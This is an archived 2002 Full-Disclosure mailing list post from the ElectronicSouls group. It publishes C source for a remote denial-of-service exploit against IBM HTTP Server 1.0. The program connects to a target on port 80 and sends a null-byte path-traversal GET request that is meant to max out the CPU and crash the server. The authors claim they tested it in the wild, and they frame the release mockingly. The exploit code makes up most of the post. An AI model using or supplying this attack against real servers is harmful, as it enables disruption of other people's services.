lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211291801.gATI1IK3058310@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - IBM HTTP Server DOS

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

If you have read our ETHICS or our NOVEL NOTES, you would know that
we are against DoS'ing in any fashion.  Keeping this in mind, we now
present to you some code to DoS the IBM HTTP Server.  We have tested
this code thoroughly in the wild, and believe it to be the very best
exploit in existance for this vulnerability.

# cat ibm-DoS.c
/*
 * CONFIDENTIAL SOURCE MATERIAL, DO NOT DISTRIBUTE !!
 * ++++++++++++++++++++++++++++++++++++++++++++++++++
 *   IBM-HTTP-Server/1.0 Denial of Service Attack
 *
 *     Bug discovered by: websk8ter aka Erebus
 *     quick proof-of-concept code by BrainStorm
 *   tested on a AS/400 SSystem with IBM httpd 1.0
 *       [ E l e c t r o n i c S o u l s ]
 */

#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>

int main(int argc, char **argv[])
{
 struct sockaddr_in sin;
 struct hostent *host;

   char buf[8192];

   int sock,
         es,
        len;

if (argc != 2)
{
  printf("Usage: %s <host>\n",argv[0]);
  exit(0);
}

  printf("\n\n[ ElectronicSouls ] IBM-HTTP-Server/1.0  Remote DoS\n");
  printf("(C) BrainStorm - 2002 Bug found by websk8ter \n\n");

  host = gethostbyname((void *)argv[1]);
  sock = socket(AF_INET, SOCK_STREAM, 0);

  bzero(&(sin.sin_zero), 8);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = htonl(INADDR_ANY);
  sin.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
  sin.sin_port = htons(80);

  es = connect(sock, (void *)&sin, sizeof(sin));

if (es == -1)
  {
   perror("[*] Connecting..");
   printf("\n");
   exit(1);
  }

   printf("[!] Connected to %s\n", argv[1]);

   memset(&buf, 0, sizeof(buf));
   sprintf(buf, "GET /%00../index4.html HTTP/1.0\n\n", argv[1]);        /* this will loop until the cpu raises t
o */
                                                             /* a usage of 100% and probably crashes.  */
   printf("[*] Submitting DoS string\n", argv[1]);
   send(sock, buf, sizeof(buf), 0);

   while (1)
   {
   memset(&buf, 0, sizeof(buf));

   len = sizeof(buf);
    es = read(sock, &buf, len);

   if (es <= 0)
   {
   exit(0);
   }
   printf("%s\n", buf);
    perror("Status ");
   exit(0);
  }
}


#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Did you know that Little Red Riding Hood was really a whore?"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nq4AMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltQUMAoLPRkVRyrkQz
+CDutBcvNazWvJHRAKCXwF5bSx/WGz2Slv6dR2ZX5xIQIg==
=QBIr
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ